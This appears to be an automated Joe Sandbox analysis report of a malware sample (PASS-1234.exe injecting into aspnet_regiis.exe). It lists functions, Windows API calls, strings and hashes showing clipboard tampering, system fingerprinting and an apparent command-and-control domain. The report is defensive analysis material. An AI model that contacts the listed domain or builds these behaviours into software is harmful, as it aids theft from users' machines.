Instruction ID: 1153f595c050e237e1062bc6162ee0105a4e6ee9464f6d8e6f671269bd2629ae
Opcode Fuzzy Hash: 503276cdf07d302b5b9899fd08790c0af04dc3eedd6def1cf6bd6977a983a17f
Instruction Fuzzy Hash: E3110C7A20FE023ADB2216785D81E2B266DEBC62BD7654335F734CE2E0FF2398004164

Function 6D3980E6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6D397B40,?,00000001,?,00000001,?,6D396E26,?,?,00000001), ref: 6D3980FD
GetLastError.KERNEL32(?,6D397B40,?,00000001,?,00000001,?,6D396E26,?,?,00000001,?,00000001,?,6D397372,3R9m), ref: 6D398109

Part of subcall function 6D3980CF: CloseHandle.KERNEL32(FFFFFFFE,6D398119,?,6D397B40,?,00000001,?,00000001,?,6D396E26,?,?,00000001,?,00000001), ref: 6D3980DF

___initconout.LIBCMT ref: 6D398119

Part of subcall function 6D398091: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D3980C0,6D397B2D,00000001,?,6D396E26,?,?,00000001,?), ref: 6D3980A4

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6D397B40,?,00000001,?,00000001,?,6D396E26,?,?,00000001,?), ref: 6D39812E

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 1d64c58f7b6f1014034e5d9a2431ae9275877d3a0f714f1be7e20a039d6cc3c3
Instruction ID: af85988763d81967e21e6a8e16194549c208e71fdcf9b42343988b0110124d7b
Opcode Fuzzy Hash: 1d64c58f7b6f1014034e5d9a2431ae9275877d3a0f714f1be7e20a039d6cc3c3
Instruction Fuzzy Hash: 41F0AC36505129BBCF221F95CC08E993F7AEF493A1F054111FB5899220EB338820EB95

Function 6D3924B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D3924BD

Part of subcall function 6D393183: HeapFree.KERNEL32(00000000,00000000,?,6D3923BC), ref: 6D393199
Part of subcall function 6D393183: GetLastError.KERNEL32(?,?,6D3923BC), ref: 6D3931AB

_free.LIBCMT ref: 6D3924D0
_free.LIBCMT ref: 6D3924E1
_free.LIBCMT ref: 6D3924F2

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 34a0a290588ad8fdadd214281cf2d12cfcceb1b571f77d35c739bf618344111f
Instruction ID: 2ec04cb1c270fe9bd97bebf97b05e4d8f12d6c523c823cba9b1d5f5858b33095
Opcode Fuzzy Hash: 34a0a290588ad8fdadd214281cf2d12cfcceb1b571f77d35c739bf618344111f
Instruction Fuzzy Hash: 06E0BFB5415120BBCE316F19E40068E3E79F74B60434E950BF555562A1D7390552DF89

Function 6D394105 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 6D393CA0: GetOEMCP.KERNEL32(00000000,6D393F11,?,00000001,6D397351,6D397351,00000001,?,?), ref: 6D393CCB

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6D393F58,?,00000000,?,6D395233,?,?,?,?,6D397351), ref: 6D394163
GetCPInfo.KERNEL32(00000000,?,?,?,6D393F58,?,00000000,?,6D395233,?,?,?,?,6D397351,00000001,?), ref: 6D3941A5

Strings

3R9m, xrefs: 6D39411D

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: 3R9m
API String ID: 546120528-2439373522
Opcode ID: ceb9003efef3ca690856835552a5841bb88a3d4d5e846030590d650688e8c55d
Instruction ID: 73f8a2fed124f10b71b0d56bbccf7c4ce7495b4910cf1fe51429a11413d868cb
Opcode Fuzzy Hash: ceb9003efef3ca690856835552a5841bb88a3d4d5e846030590d650688e8c55d
Instruction Fuzzy Hash: 775100709043469EEB118FB9C841AABBBF8FF99344F14816EC0E68F251F3769546CB94

Function 6D391DB8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\PASS-1234.exe, xrefs: 6D391DFB, 6D391E02, 6D391E38

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\PASS-1234.exe
API String ID: 0-221246543
Opcode ID: df775f0236680030045b530ccf3a50f25745a692554a0d54564af86d2990b067
Instruction ID: 3cc07ed9242dfb6fce36dc0167ba79ff0475ab117bfa4928a64d7bddb01e33a0
Opcode Fuzzy Hash: df775f0236680030045b530ccf3a50f25745a692554a0d54564af86d2990b067
Instruction Fuzzy Hash: 2A418671E04215AFDB22DB99C881AAFBBFDEF89310F154066E555EB240F7719A40CB50

Analysis Process: aspnet_regiis.exePID: 4512, Parent PID: 1916COMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	22.9%
Total number of Nodes:	375
Total number of Limit Nodes:	27

Executed Functions

Function 031A88E0 Relevance: 25.3, APIs: 11, Strings: 3, Instructions: 787
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(031B3698,00000000,00000001,031B3688,00000000), ref: 031A8B00
SysAllocString.OLEAUT32(FFA1FDAE), ref: 031A8B86
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 031A8BC8
SysAllocString.OLEAUT32(924C9C34), ref: 031A8C32
SysAllocString.OLEAUT32(C18DC795), ref: 031A8CF7
VariantInit.OLEAUT32(3D3C43BA), ref: 031A8D6D

Strings

\, xrefs: 031A8AB4
xyz{, xrefs: 031A914E
k_XY, xrefs: 031A8956

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: \$k_XY$xyz{
API String ID: 65563702-3857921785
Opcode ID: 25d422530d67ab76e4fab80278b1d2ab0e0a2ef2890763aca91522049ec2bfd0
Instruction ID: 59a1ef4c14ed51500e0d1bda05b54029cfbc5ebb9c65a83009d211da7bac9578
Opcode Fuzzy Hash: 25d422530d67ab76e4fab80278b1d2ab0e0a2ef2890763aca91522049ec2bfd0
Instruction Fuzzy Hash: F4423476A087418FD714CF28C88179BBBE6EFC8310F198A2CE5959B391D734D946CB92

Function 03193450 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 441
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 031934E6
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0319356F

Strings

QU, xrefs: 031935D1
ps, xrefs: 031938A3
Hi+k, xrefs: 031939BB
y{, xrefs: 0319399B
Y, xrefs: 031935D9
{y, xrefs: 031938B3
z{, xrefs: 03193495
uw, xrefs: 031939B3
pD, xrefs: 031938AB

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: Hi+k$QU$Y$pD$ps$z{${y$uw$y{
API String ID: 237503144-3059748046
Opcode ID: be31e1e6d272697f5d01b8e7e15ad825648acfd39c8a625041b24f96d5413cdf
Instruction ID: 3288d09abf94c231c779b48280e38a9225a4c2606fabc131eb14724c34ebde64
Opcode Fuzzy Hash: be31e1e6d272697f5d01b8e7e15ad825648acfd39c8a625041b24f96d5413cdf
Instruction Fuzzy Hash: 98E1D8B81083408FE714DF25D89166BBBF5EF8A754F08892DE4E58B391E378C54ACB52

Function 05711000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 05711032
OpenClipboard.USER32(00000000), ref: 0571103C
GetClipboardData.USER32(0000000D), ref: 0571104C
GlobalLock.KERNEL32(00000000), ref: 0571105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05711090
GlobalLock.KERNEL32 ref: 057110A0
GlobalUnlock.KERNEL32 ref: 057110C1
EmptyClipboard.USER32 ref: 057110CB
SetClipboardData.USER32(0000000D), ref: 057110D6
GlobalFree.KERNEL32 ref: 057110E3
GlobalUnlock.KERNEL32(?), ref: 057110ED
CloseClipboard.USER32 ref: 057110F3
GetClipboardSequenceNumber.USER32 ref: 057110F9

Memory Dump Source

Source File: 00000003.00000002.3390308113.0000000005711000.00000020.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: true

Associated: 00000003.00000002.3390287880.0000000005710000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3390327465.0000000005712000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5710000_aspnet_regiis.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: f6e04f6340f33499fe71c9012d15b13bf66a8f700b7b68da96a992cc5f9d09ad
Instruction ID: d47ab9e1af36de68d712d7a87dff2700e264cc90773c1f6a398c85456ca8f3dd
Opcode Fuzzy Hash: f6e04f6340f33499fe71c9012d15b13bf66a8f700b7b68da96a992cc5f9d09ad
Instruction Fuzzy Hash: 81219B35A183509BD7206B7E9C0EB6ABFA8FF04741F458424FE45DA151EF218800F769

Function 0317DF42 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0317DF49

Strings

1`2, xrefs: 0317E1E2
\[HK, xrefs: 0317DFDC
OL, xrefs: 0317E1CD
abruptyopsn.shop, xrefs: 0317E26C
S`/s, xrefs: 0317DF62
~q, xrefs: 0317E22D
FS, xrefs: 0317E1BF
@V, xrefs: 0317E1C6
L`/s, xrefs: 0317DF91

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: Uninitialize
String ID: 1`2$@V$FS$L`/s$OL$S`/s$\[HK$abruptyopsn.shop$~q
API String ID: 3861434553-3593189232
Opcode ID: 31627f79e15bfae8ba415d678f5e907fe7efec83b62f67f6ab7578ab09b8aa80
Instruction ID: 11bd9723faaca275f11bdd14f6073c903c6fc057ea0c38ff21dfa9113131f835
Opcode Fuzzy Hash: 31627f79e15bfae8ba415d678f5e907fe7efec83b62f67f6ab7578ab09b8aa80
Instruction Fuzzy Hash: 5A91E6B4605B828FD31ACF3985A0262FFF2BF5A20471C86DCD0D64B755C735A456CBA1

Function 0319CE11 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0319D215

Strings

/CWk, xrefs: 0319D2D6
CV,^, xrefs: 0319D292
'x1;, xrefs: 0319D3C0
~|[g, xrefs: 0319D18F, 0319D1A3
~|[g, xrefs: 0319CE58
gue3, xrefs: 0319D29A

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 'x1;$/CWk$CV,^$gue3$~|[g$~|[g
API String ID: 3960555810-2508064178
Opcode ID: 08e4fa0786fea57a58fb3f8712c6995af501460ea0c8a5f22f84c54924b427d6
Instruction ID: 008fb0ffd9a5ea253f7e78cced612f6b073ee06b6229e3e9fafcb5b3fb24855b
Opcode Fuzzy Hash: 08e4fa0786fea57a58fb3f8712c6995af501460ea0c8a5f22f84c54924b427d6
Instruction Fuzzy Hash: 0BA1C57050C3D18BDB39CF2994503ABBFD1AF9B305F0889AED0D99B286D7358146CB66

Function 0319D150 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0319D215

Strings

/CWk, xrefs: 0319D3C7
/CWk, xrefs: 0319D2D6
CV,^, xrefs: 0319D292
'x1;, xrefs: 0319D3C0
~|[g, xrefs: 0319D18F, 0319D1A3
gue3, xrefs: 0319D29A

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 'x1;$/CWk$/CWk$CV,^$gue3$~|[g
API String ID: 3960555810-310644163
Opcode ID: 5960c6885ebf061e1faca7ffd649c58c64bdb0deef5076ea633f62d8d6cde2a0
Instruction ID: 34b7a1dd3f00a540786e7a70da5e3f85325bb7b3e8863cb74fdf988c54c1412e
Opcode Fuzzy Hash: 5960c6885ebf061e1faca7ffd649c58c64bdb0deef5076ea633f62d8d6cde2a0
Instruction Fuzzy Hash: 1391D77050C3D18BD73ACF2994503ABBBE1AF9F305F0889AED0D99B286D7354146CB66

Function 031786D0 Relevance: 7.7, APIs: 5, Instructions: 212
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 031786F4
GetCurrentThreadId.KERNEL32 ref: 031786FE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 031787E4
GetForegroundWindow.USER32 ref: 03178891
ExitProcess.KERNEL32 ref: 03178969

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 5e17c00f7821dcd7652c018b57547e99b3a37960f8bb810b422915f258311062
Instruction ID: be361fc65d9ec616548dcf13e21c98b0f53319ee023f3d54de055641860f4dc1
Opcode Fuzzy Hash: 5e17c00f7821dcd7652c018b57547e99b3a37960f8bb810b422915f258311062
Instruction Fuzzy Hash: 70512876B047044FC318FEB8DC46359B6E79BC8210F0E853DA9A9EB395FA788C458791

Function 031A41B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 031A41FE
GetSystemMetrics.USER32 ref: 031A420D

Strings

, xrefs: 031A42E1

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: da488fa449ef42ca8e95ac8a5cafff9568d8eb0083adc2d82308d44fde10b48b
Instruction ID: 3b3e85b7fe9523e02d31e712ba743c3f40fb85d3c2450273ffa66a2e89d18fad
Opcode Fuzzy Hash: da488fa449ef42ca8e95ac8a5cafff9568d8eb0083adc2d82308d44fde10b48b
Instruction Fuzzy Hash: 345191B4E142089FCB44EFACD98569DBBF0BB4C310F108529E498E7354E734A994CF92

Function 03183756 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 03183B9A

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: d21653fa7544721323fcc262d5cf60471f21f5dfe8ae09bf77a6829c394699ea
Instruction ID: 74ba914844db82628fcb79ca8bb2a803ad01de5448fea35987bf3e8c82973f4f
Opcode Fuzzy Hash: d21653fa7544721323fcc262d5cf60471f21f5dfe8ae09bf77a6829c394699ea
Instruction Fuzzy Hash: 1CD1CE7D60D3808BD328EB28C4943AABBD1AF88714F1D8D2DD8E587391D7758485CF56

Function 0319C607 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0319C635
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0319E6D4

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 58f6597ca551c070ae5902d258fa18d024cb3bdab22c184a480dd7bf9cbd7493
Instruction ID: d69f463c6fce2790c063f77ac650a58029f49861e697990a9a47c93213b27a0f
Opcode Fuzzy Hash: 58f6597ca551c070ae5902d258fa18d024cb3bdab22c184a480dd7bf9cbd7493
Instruction Fuzzy Hash: AC31F83561C28197DB2DDF39D4213FBBBE5AB9A300F58556ED0CAD7291DB3488018761

Function 0319C601 Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0319C635
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0319E6D4

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: c9ed6f9b08cdbdbd742e34b9d8a72d3da960acb137cd8d08bf03a44a1ad90a6a
Instruction ID: 928c1d4c858a8e3d2ed5eb33d8b846948a5bd6a1d5c6da073b1190d94fbfae50
Opcode Fuzzy Hash: c9ed6f9b08cdbdbd742e34b9d8a72d3da960acb137cd8d08bf03a44a1ad90a6a
Instruction Fuzzy Hash: ED210735A1824087DB2CDF35D4223BBBAE6AB8A300F59957ED08AD7294DB3488018761

Function 0319E5EF Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0319E6D4

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: d8b2d383141aef94e25c9dfb2ec14ca9302ed8ecea6770ca7f2ac60b1b6db905
Instruction ID: e97527c5e6b7d781c2ec3a084220963afbb9b946b7fffbebcab01f5614333542
Opcode Fuzzy Hash: d8b2d383141aef94e25c9dfb2ec14ca9302ed8ecea6770ca7f2ac60b1b6db905
Instruction Fuzzy Hash: D7212836A1864087D72CDF39D4223FBBBE5AB8A300F58957ED18AD7294DB3488018761

Function 031AD962 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 031AD99F

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: d6918d45f358db2b22a77d9ee6f1327acb480c1f9d58597bd355fe7470abc7fc
Instruction ID: 4a55d7882274e5857007888c6a6ad04637e68570452461d19f07390cd69d557c
Opcode Fuzzy Hash: d6918d45f358db2b22a77d9ee6f1327acb480c1f9d58597bd355fe7470abc7fc
Instruction Fuzzy Hash: 07F0ECB8A087808BD708EF3CF4666A77BF4D75A305F042C68D282D7256F736C8528B12

Function 031AD810 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(031B0AEE,00000002,00000018,?,?,00000018,?,?,?), ref: 031AD83E

Memory Dump Source

Source File: 00000003.00000002.3389532539.0000000003171000.00000020.00000400.00020000.00000000.sdmp, Offset: 03170000, based on PE: true

Associated: 00000003.00000002.3389516195.0000000003170000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389587692.00000000031B5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3389606780.00000000031C3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3170000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 031A7321 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 031A735F

Strings

, xrefs: 031A7376

Memory Dump Source

